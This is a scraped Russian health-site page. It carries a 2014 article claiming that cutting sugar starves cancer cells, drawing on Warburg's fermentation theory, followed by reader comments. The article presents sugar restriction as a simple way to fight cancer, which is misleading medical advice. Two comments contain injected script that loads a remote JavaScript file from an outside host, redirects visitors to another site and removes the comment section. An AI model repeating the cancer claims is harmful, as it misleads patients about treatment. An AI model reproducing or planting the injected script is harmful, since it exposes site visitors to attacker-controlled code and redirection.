Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Не ешьте всего один проду...  >>  Не ешьте всего один продукт – раковые клетки умрут от голода!
 
Обратная связь
 

Не ешьте всего один продукт – раковые клетки умрут от голода!

Размер шрифта
16 января 2014 00:00
Юрий Малышев
Здоровье инфо
Александр Чистяков
Здоровье инфо
  • google_analytics: false
  • Нравится

Все клетки нашего организма нуждаются в глюкозе, но больше всего она нужна раку! Можно ли убить раковые клетки сахарным голодом?

Несмотря на то, что углеводная зависимость злокачественных опухолей описана еще в 20-х годах прошлого столетия, широкой известности этот феномен не получил, и многие онкологические пациенты даже и не подозревают, что чем больше простых сахаров они потребляют, тем более упорным будем сопротивление рака.

Впервые об этой концепции заговорил доктор Отто Вартбург, немецкий физиолог и биохимии, лауреат Нобелевской премии. Великий ученый был убежден, что рак принципиально возможно заморить голодом. Не в буквальном смысле, отказываясь от еды, а ограничивая некоторые компоненты рациона, которые, словно брызги керосина, лишь усиливают пламя малигнизации.

Эта идея целиком основывается на известных представлениях о биохимии энергетического обмена. В клетках глюкоза является основным источником энергии, которая в конечном итоге запасается в виде молекул под названием АТФ. Эти молекулы образуются в ходе ряда сложных химических реакций. Этот процесс условно можно разделить на два этапа: кислород-независимый (протекает в цитоплазме) и кислород-зависимый (протекает в митохондриях). По всей видимости, в опухолевых клетках митохондрии не могут функционировать должным образом, поэтому процесс обрывается на первом этапе. Окисление глюкозы становится невозможным, вместо него происходит ферментация (брожение). Этот процесс обладает очень низкой эффективностью, поэтому малейший дефицит исходного субстрата (глюкозы) приводит к нехватке АТФ, которая является катастрофической для раковой клетки.

Поэтому самый простой шаг в борьбе с раком – ограничить употребление сахара! Пирожные, печенье, конфеты – все это стоит убрать из своего рациона. Однако этого недостаточно. Многие продукты, на первый взгляд не слишком-то сладкие (некоторые йогурты, хлебобулочные изделия, мюсли и ряд других), на самом деле содержат бездну простых углеводов, вопреки кричащим лозунгам вроде «Натуральный продукт» и тому подобных. Поэтому всегда очень внимательно читайте состав.

Словом, будьте внимательны к тому, что едите! И даже если у вас нет рака, снизить потребление сахара все равно не помешает. Как минимум, чтобы держать себя в хорошей форме, верно?

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - his shadow

11 января 2015 в 12:57

Комментарий удален за нарушение Правил общения

2 - Гость

03 февраля 2015 в 11:18

Цитировать   |   Пожаловаться

Это правда.я поздно узнала об этом будучи уже больной.но самочувствие благодарно отзывается на такое сахарное голодание.

3 - Гость

14 марта 2015 в 14:41

Цитировать   |   Пожаловаться

Здравствуйте,  хочу сказать, что раковые клетки ничем не питаются! Ученые проводили эксперимент,   в пробирку отсадили несколько раковых клеток и на протяжение нескольких лет не  подкармливали их, наблюдая, затем открыли пробирку,  а там столько этих клеток!  Вывод : ерунда это все про сладкое! только пополнеете или сахарный диабет, что мало вероятно будет. 

4 - zzzzzz

30 июня 2015 в 18:49

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

5 - zzzzzz

30 июня 2015 в 22:48

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Любимая еда рака   Какой напиток не позволит вам ослепнуть?!   Узнайте, будет ли у вас рак в течение 10 лет   На что слетаются мухи? Оказывается, на рак!  
23 июля 2013Из лысых крыс сделают лекарство от рака 01 ноября 2013ИНВИТРО – «Марка №1» в России
 
21 октября 2013ИНВИТРО открыла центр лучевой диагностики «ИНВИТРО.Эксперт» 11 октября 2013Елена Малышева расскажет все о том, как правильно худеть
 

Слайдшоу

1
Что можно и чего нельзя с изжогой?
Бронхит: лицом к лицу
Еда против рака. Часть 2

Тесты

1
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Как устроены волосы человека?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.